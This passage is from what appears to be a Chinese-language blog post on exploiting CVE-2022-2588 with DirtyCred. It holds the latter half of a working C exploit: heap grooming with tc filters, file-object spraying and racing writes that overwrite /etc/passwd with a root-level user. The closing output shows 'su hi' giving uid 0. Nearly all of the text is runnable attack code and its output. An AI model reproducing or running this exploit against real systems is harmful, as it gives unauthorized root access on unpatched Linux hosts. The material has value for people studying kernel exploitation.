// (kcmp with KCMP_FILE returning 0 means both descriptors refer to the same open file)
if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) == 0)
{
printf("[10-1] found overlapped file, id : %d, %d\n", i, j);
overlap_a = fds[j];
overlap_b = fd_2[i];
// 11. start 2 threads: Thread 1-take up write lock; Thread 2-write evil data
printf("[11] start 2 threads compete to write\n");
pthread_t pid, pid2;
pthread_create(&pid, NULL, slow_write, NULL);
pthread_create(&pid2, NULL, write_cmd, NULL);

// busy-wait until write_cmd() signals that it is about to call writev()
while (!run_spray) {}
// 12. spray privileged `file` object
// Both descriptors were reported by kcmp as the same file, and each one is closed.
// NOTE(review): presumably this releases the shared file object while the
// write from thread 2 is still pending - confirm against the DirtyCred write-up.
close(overlap_a);
close(overlap_b);

usleep(1000 * 100);
// tell the sprayer process in run_exp() to start, then wait for its 2-byte answer
int spray_num = 4096;
write(pipe_file_spray[0][1], &spray_num, sizeof(int));
if (read(pipe_file_spray[1][0], &msg, 2) != 2)
err(1, "[-] read from file spray");
overlapped = true;
}
}
if (overlapped)
break;
}
// 13. finish exploitation
sleep(3);
// wait until slow_write() has cleared run_write, i.e. its writev() returned
while (run_write) { sleep(1); }
printf("[13] check whether we overwrite the privileged file\n");
if (!overlapped) {
printf("[-] no overlap found :(...\n");
write(pipe_main[1], "\xff", 1);
}
else {
// NOTE(review): the open()/read() results are not checked and xx is never closed.
int xx = open(target, 0);
char buf[0x100] = {};
// check if user (hi) in the passwd
read(xx, buf, 0x30);
if (!strncmp(buf, "hi", 2))
write(pipe_main[1], "\x00", 1);
else {
printf("[-] not successful : %s\n", buf);
write(pipe_main[1], "\xff", 1);
}
}
// keep the process (and every descriptor it holds) alive
while (1) { sleep(1000); }
}

// run_exp() - create the notification pipes and fork the cooperating
// processes of the proof of concept:
//
//   * a sprayer that waits on pipe_file_spray[0] and then opens `target`
//     4096 times in itself and 4096 times in a further child (step 12);
//   * the main process, which runs pre_exploit() and exploit();
//   * a defragmentation process that opens `target` 10000 times (step 1);
//   * the calling process itself, which performs the add_tc_basic() /
//     delete_tc_basic() sequence (steps 2, 4, 5, 7) in lock-step with
//     exploit() via pipe_child / pipe_parent.
//
// Every branch ends in an endless sleep loop, so in practice the function
// does not return; the trailing `return 0` only satisfies the declared type.
int run_exp() {
    // 0. initialize pipe as notifier
    if (pipe(pipe_parent) == -1)
        err(1, "[-] fail to create pipes\n");
    if (pipe(pipe_child) == -1)
        err(1, "[-] fail to create pipes\n");
    if (pipe(pipe_defrag) == -1)
        err(1, "[-] fail to create pipes\n");
    if (pipe(pipe_file_spray[0]) == -1) // begin spray file
        err(1, "[-] fail to create pipes\n");
    if (pipe(pipe_file_spray[1]) == -1) // end spray file
        err(1, "[-] fail to create pipes\n");
    cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);

    if (fork() == 0) {
        // 12. sprayer process - open `target` 4096*2 times once told to
        //     (blocks on pipe_file_spray[0] until exploit() writes to it)
        adjust_rlimit();
        int spray_num = 0;
        // read() returns ssize_t. Comparing it with the unsigned sizeof
        // directly would turn -1 into a huge value and hide the failure.
        if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) != (ssize_t)sizeof(int))
            err(1, "[-] read file spray");

        printf("[12] got cmd, start spraying 4096*2 `file` by opening %s\n", target);
        spray_num = 4096;
        if (fork() == 0) { // first 4096 `file` objects (child of the sprayer)
            for (int i = 0; i < spray_num; i++) {
                pin_on_cpu(i % cpu_cores);
                open(target, 0);
            }
            while (1) { sleep(10000); }
        }
        // second 4096 `file` objects (the sprayer itself)
        for (int i = 0; i < spray_num; i++) {
            pin_on_cpu(i % cpu_cores);
            open(target, 0);
        }
        printf("[*] spray done\n");
        write(pipe_file_spray[1][1], "OK", 2); // tell exploit() the spray is finished
        while (1) { sleep(10000); }
        exit(0);
    }
    // 0. preprocess & start main exploit
    if (fork() == 0) {
        pin_on_cpu(0);
        pre_exploit(); // set up process memory / working dir / namespace
        exploit();     // main exploit
    }
    else
    {
        sleep(2);
        if (fork() == 0)
        {
            // 1. defragmentation - spray 10000 `file` to exhaust all file slabs for cross cache - all cores
            adjust_rlimit();
            printf("[1] defragmentation - spray 10000 `file` to exhaust all file slabs for cross cache\n");
            for (int i = 0; i < 10000; i++) {
                pin_on_cpu(i % cpu_cores);
                open(target, 0);
            }

            if (write(pipe_defrag[1], "OK", 2) != 2)
                err(1, "[-] failed write defrag");
            while (1) { sleep(1000); }
        }
        else
        {
            // 2. spray thread - core 0 spray kmalloc-192 & kmalloc-256
            setup_namespace();
            pin_on_cpu(0);
            int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0);
            assert(sprayfd != -1);
            add_qdisc(sprayfd);
            // 2-1. prepare payload
            char msg[0x10] = {};
            char payload[256] = {};
            memset(payload + 0x10, 'A', 256 - 0x10);

            // wait for the defragmentation process to finish
            if (read(pipe_defrag[0], msg, 2) != 2)
                err(1, "[-] failed read defrag");

            // if the exploit keeps failing, please tune the middle and end
            int middle = 38; // 38
            int end = middle + 40; // 40
            // 2-2. spray (38+3)*32 filters in kmalloc-192 & kmalloc-256
            printf("[2] spray (38+3)*32 kmalloc-192 & kmalloc-256\n");
            for (int i = 0; i < middle; i++)
                add_tc_basic(sprayfd, i + 1, payload, 193, 32);

            add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
            add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
            add_tc_basic(sprayfd, middle + 3, payload, 193, 32);
            if (write(pipe_child[1], "OK", 2) != 2)
                err(1, "[-] write to parent\n");
            // 4. spray more filters in kmalloc-192 & kmalloc-256
            if (read(pipe_parent[0], msg, 2) != 2)
                err(1, "[-] read from parent");

            // prepare another part for cross cache
            printf("[4] spray kmalloc-192 & kmalloc-256\n");
            for (int i = middle + 2; i < end; i++)
                add_tc_basic(sprayfd, i + 1, payload, 193, 32);
            // 5. free (end-24)*32 kmalloc-192 & kmalloc-256
            printf("[5] free (end-24)*32 kmalloc-192 & kmalloc-256\n");
            for (int i = 1; i < end - 24; i++) {
                // prevent double free of 192 and being reclaimed by others
                if (i == middle || i == middle + 1)
                    continue;
                // delete_tc_basic() returns a malloc'ed reply buffer; release it
                free(delete_tc_basic(sprayfd, i + 1));
            }
            if (write(pipe_child[1], "OK", 2) != 2)
                err(1, "[-] write to parent\n");
            // 7. free (end-middle+1)*32 kmalloc-192 & kmalloc-256
            if (read(pipe_parent[0], msg, 2) != 2)
                err(1, "[-] read from parent");
            printf("[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256\n");
            free(delete_tc_basic(sprayfd, middle + 2));
            free(delete_tc_basic(sprayfd, middle + 3));
            free(delete_tc_basic(sprayfd, 1));
            for (int i = middle + 2; i < end; i++)
                free(delete_tc_basic(sprayfd, i + 1));
            if (write(pipe_child[1], "OK", 2) != 2)
                err(1, "[-] write to parent\n");
            while (1) { sleep(1000); }
        }
    }
    return 0;
}

// main() - prepare the shared state, launch run_exp() in a child process and
// report the one-byte verdict the child side writes to pipe_main.
//
// A 0x2000-byte shared anonymous mapping (`global`) holds self_path at offset
// 0 and, from offset 0x100, `content`: the `overwrite` string followed by up
// to 0x1000 bytes read from `target`.
// Returns 1 if the setup fails, 0 otherwise (whatever the verdict is).
int main(int argc, char** argv) {
    (void)argc;

    global = (char*)mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_SHARED | MAP_ANON, -1, 0);
    if ((void*)global == MAP_FAILED) {
        perror("[-] mmap");
        return 1;
    }
    memset(global, 0, 0x2000);

    self_path = global;
    // get_current_dir_name() returns a malloc'ed string (or NULL on error).
    char* cwd = get_current_dir_name();
    snprintf(self_path, 0x100, "%s/%s", cwd ? cwd : ".", argv[0]);
    free(cwd);
    printf("[*] self path %s\n", self_path);

    // prepare write data - evil data + existing data in /etc/passwd
    printf("[*] prepare evil data\n");
    int fd = open(target, 0);
    if (fd < 0) {
        perror("[-] open target");
        return 1;
    }
    content = (char*)(global + 0x100);
    strcpy(content, overwrite);
    if (read(fd, content + strlen(overwrite), 0x1000) < 0)
        perror("[-] read target");
    close(fd);

    // run_exp() in sub-process
    // pipe() must not live inside assert(): with NDEBUG the call would vanish.
    if (pipe(pipe_main) != 0) {
        perror("[-] pipe");
        return 1;
    }
    if (fork() == 0) {
        run_exp(); // main exploit
        while (1) { sleep(10000); }
    }

    // judge if succeed; treat a failed or empty read as failure
    char data = (char)0xff;
    if (read(pipe_main[0], &data, 1) == 1 && data == 0)
        printf("[+] succeed\n");
    else
        printf("[-] failed\n");
    return 0;
}

结果如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ ./exploit
[*] self path /home/hi/./exploit
[*] prepare evil data
Old limits -> soft limit= 14096 hard limit= 14096
[*] starting exploit, num of cores: 4
[1] defragmentation - spray 10000 `file` to exhaust all file slabs for cross cache
[2] spray (38+3)*32 kmalloc-192 & kmalloc-256
[3] allocate the vulnerable filter
[4] spray kmalloc-192 & kmalloc-256
[5] free (end-24)*32 kmalloc-192 & kmalloc-256
[6] 1st freed the filter object
[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256
[8] spray 4000 uprivileged `file`
[9] 2nd free the filter object
pause after 2nd free
[10] spraying 5000 unprivileged `file`
[10-1] found overlapped file, id : 22, 1930
[11] start 2 threads compete to write
[11-1] start slow write
[11-2] write evil data after the slow write
[12] got cmd, start spraying 4096*2 `file` by opening /etc/passwd
[*] spray done
[*] write done, spent 9.352879 s
[13] check whether we overwrite the privileged file
[+] succeed
$ su hi
Password:
# id
uid=0(hi) gid=0(root) groups=0(root)
# cat /etc/passwd
hi:x:0:0:root:/:/bin/sh
root::0:0:root:/root:/bin/bash

参考:CVE-2022-2588 Double-free 漏洞 DirtyCred 利用